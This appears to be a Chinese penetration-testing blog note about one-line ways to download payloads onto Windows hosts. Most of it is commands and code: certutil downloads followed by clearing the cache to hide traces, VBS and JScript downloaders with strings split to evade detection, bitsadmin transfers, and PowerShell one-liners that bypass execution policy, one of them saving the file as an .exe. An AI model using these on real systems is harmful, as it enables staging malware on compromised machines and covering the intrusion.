渗透测试笔记5-一句话下载payload

certutil

Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书, 密钥对和证书链

下载

默认下载后为bin文件,但不影响执行
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt

清除缓存

防止留下痕迹
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete

vbs

保存

1
downfile.vbs set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open  "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile  wsh.arguments(1),2

或者命令行下执行:

1
echo set a=downfile.vbs set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open  "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile  wsh.arguments(1),2 >> downfile.vbs

命令行下执行:

cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt

参数化下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
strFileURL = "http://192.168.1.115/robots.txt" 
strHDLocation = "c:\test\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

js

读取:

cscript /nologo downfile.js http://192.168.1.115/robots.txt

代码:

1
2
3
4
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

写入:

cscript /nologo dowfile2.js http://192.168.1.115/robots.txt

代码:

1
2
3
4
5
6
7
8
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

bitsadmin

自windows7以上版本内置bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。

bitsadmin /rawreturn /transfer down “http://192.168.1.115/robots.txt" E:\PDF\robots.txt

需要注意的是,bitsadmin要求服务器支持Range标头。
如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行

bitsadmin /setpriority down foreground

如果下载文件在1-5M之间,需要时时查看进度。同样它也支持进度条。

1
bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

后者的话:不支持https协议。

powershell

自Windows7以后内置了powershell,如Windows 7中内置了PowerShell2.0,Windows 8中内置了PowerShell3.0。

查看版本:

powershell $PSVersionTable

脚本:

1
2
3
4
5
6
7
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\"
ForEach ( $item in $Urls){
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file)
}

powershell C:\inetpub\down.ps1

注:需要绝对路径

在powershell 3.0以后,提供wget功能,既Invoke-WebRequest

1
2
3
4
5
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

一句话执行(实用):

1
powershell -exec bypass -c (new-object  System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')